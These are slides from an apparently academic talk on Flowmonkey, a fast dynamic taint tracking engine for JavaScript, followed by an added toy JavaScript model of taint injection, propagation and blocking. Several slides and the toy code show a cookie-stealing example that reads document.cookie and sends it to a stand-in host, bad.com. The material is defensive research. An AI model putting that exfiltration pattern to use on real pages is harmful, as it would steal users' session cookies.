Flowmonkey: A Fast Dynamic Taint Tracking Engine for JavaScript
Don Jang, UC San Diego


document.cookie

Identity Theft ✗ Cookie Stealing

Password

Credit card #

Browsing history

Epidemic of Data Stealing JavaScript!

How to Detect Data Stealing?

Without Sacrificing Performance?

Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work & Conclusion

Dynamic Taint Tracking

Tracks where a value goes at runtime

Dynamic Taint Tracking

1. Tag a value with a taint
2. Propagate taints with the value
3. Block taints from untrusted sinks

Example: Cookie Stealing

    ck = document.cookie;
    data = tmp + ck;
    send("bad.com", data);

Example: Cookie Stealing

Step 1. Inject taints (at confidential sources)

    ck = document.cookie;     // document.cookie is a confidential source: its value is tagged
    data = tmp + ck;
    send("bad.com", data);

Example: Cookie Stealing

Step 2. Propagate taints (at assignments, etc.)

    ck = document.cookie;     // ck now carries the cookie's taint
    data = tmp + ck;          // the taint of tmp + ck flows into data
    send("bad.com", data);    // data is tainted when it reaches send()

Example: Cookie Stealing

Step 3. Block taints (at untrusted sinks)

    "cr=" + color
    send("bad.com", data);    // tainted data reaching an untrusted sink is blocked

Dynamic Taint Tracking: Policies

Cookie Protection:    cookie flowing to send()           ✗
Password Protection:  password flowing to send()         ✗
General Policy:       secret info flowing to expression  ✗

Dynamic Taint Tracking: JS

- Cross site scripting prevention with dynamic data tainting and static analysis, NDSS'07
- Analyzing information flow in JavaScript-based browser extensions, ACSAC'09
- An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications, CCS'10

10~100x slowdown

Goal: Make It Fast

Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work & Conclusion

Flowmonkey

Source code -> Interpreter -> JIT Engine
Based on JaegerMonkey
Modification (M): taint tracking logic is augmented

Language Extensions: __taint(val, t)
  val: a value to be tainted
  t:   a taint to be used

Language Extensions: __taintof(val)
  returns the taint of val

Language Extensions: example

    var secret = __taint(34349, 1);
    tmp = secret * 68;
    tmp2 = tmp + "345";
    tmp3 = parseInt(tmp2);
    alert(__taintof(tmp)); // 1 is printed
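The cookie-stealing walkthrough above (inject, propagate, block) and the __taint/__taintof example, modelled as an added example that is not Flowmonkey's code: the engine keeps taints on a shadow stack, while this toy model wraps values explicitly and propagates taints through a few operations. The Tainted class, tAdd/tMul/tParseInt helpers, the COOKIE_TAINT bit and the cookie string are all constructed for illustration.

```javascript
// Toy taint model (added example, not Flowmonkey's implementation). A taint is a
// bitmask; 0 means untainted. Propagation joins operand taints with bitwise OR.
class Tainted {
  constructor(value, taint) { this.value = value; this.taint = taint; }
}
// Step 1: tag a value with taint t (mirrors the slides' __taint(val, t))
function __taint(val, t) { return new Tainted(val, t); }
// Read the taint of a value (mirrors __taintof); plain values are untainted
function __taintof(val) { return val instanceof Tainted ? val.taint : 0; }
function raw(val) { return val instanceof Tainted ? val.value : val; }
// Step 2: propagate taints through operations (shadow-stack "join" from the slides)
function tJoin(...args) { return args.reduce((t, a) => t | __taintof(a), 0); }
function tAdd(a, b) { return __taint(raw(a) + raw(b), tJoin(a, b)); }
function tMul(a, b) { return __taint(raw(a) * raw(b), tJoin(a, b)); }
function tParseInt(a) { return __taint(parseInt(raw(a), 10), tJoin(a)); }
// Step 3: block at the untrusted sink. Policy: cookie taint must not reach send().
const COOKIE_TAINT = 1; // constructed taint id for document.cookie
const sent = [];        // what actually left the page (for inspection)
function send(host, data) {
  if (__taintof(data) & COOKIE_TAINT) return { blocked: true, host };
  sent.push({ host, data: raw(data) });
  return { blocked: false, host };
}
// The slides' cookie-stealing flow; document.cookie is a constructed sample string
function cookieStealingDemo() {
  const documentCookie = __taint("session=abc123", COOKIE_TAINT); // inject at source
  const tmp = "x=";
  const ck = documentCookie;
  const data = tAdd(tmp, ck);     // taint propagates through the concatenation
  return send("bad.com", data);   // tainted data at the sink: blocked
}
// The untainted "cr=" + color case: nothing confidential flows, so send() passes
function benignDemo() {
  const data = tAdd("cr=", "red");
  return send("bad.com", data);
}
// The __taint / __taintof example: taint 1 survives *, + and parseInt
function languageExtensionDemo() {
  const secret = __taint(34349, 1);
  const tmp = tMul(secret, 68);
  const tmp2 = tAdd(tmp, "345");
  const tmp3 = tParseInt(tmp2);
  return { tmp: __taintof(tmp), tmp3: __taintof(tmp3), value: raw(tmp3) };
}
```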

Implementation: Shadow Stack

    s * 6    ->    push s    // s = 5
                   push 6
                   mul

Real Stack        Shadow Stack
5                 s's taint
6                 6's taint
30 (mul result)   joined taint

Implementation: Shadow Property

    a.fld = secret

Object a:
  Real Properties:    fld, ...
  Shadow Properties:  fld's taint, ...

Hybrid Approach

Interpreter: full-fledged taint tracking
JIT Engine:  taint detecting

- If it doesn't touch a taint: stays in the taint-detecting JIT engine
- Taint detected!! -> do full-fledged taint tracking

Hybrid Approach

Rapid prototyping
Fast with few taints
Slow with many taints

Performance: Baseline
(Sunspider; cookie doesn't flow to 3rd party code)

Performance: Cookie Tracking
(Sunspider; cookie doesn't flow to 3rd party code)

Demo

Motivation
Dynamic Taint Tracking
Flowmonkey
Future Work & Conclusion

Future Work: Missing Flows
  Implicit flows, timing channel, etc.

Future Work: Empirical Study
  To prove the usability of taint tracking

Conclusions
  A fast hybrid taint tracking engine
  First JIT-enabled taint tracking engine
  Still many missing parts
    Possible to make it a protection tool?
    Can we sacrifice some performance?

Resources: http://firebird.ucsd.edu/flowmonkey

Thank you!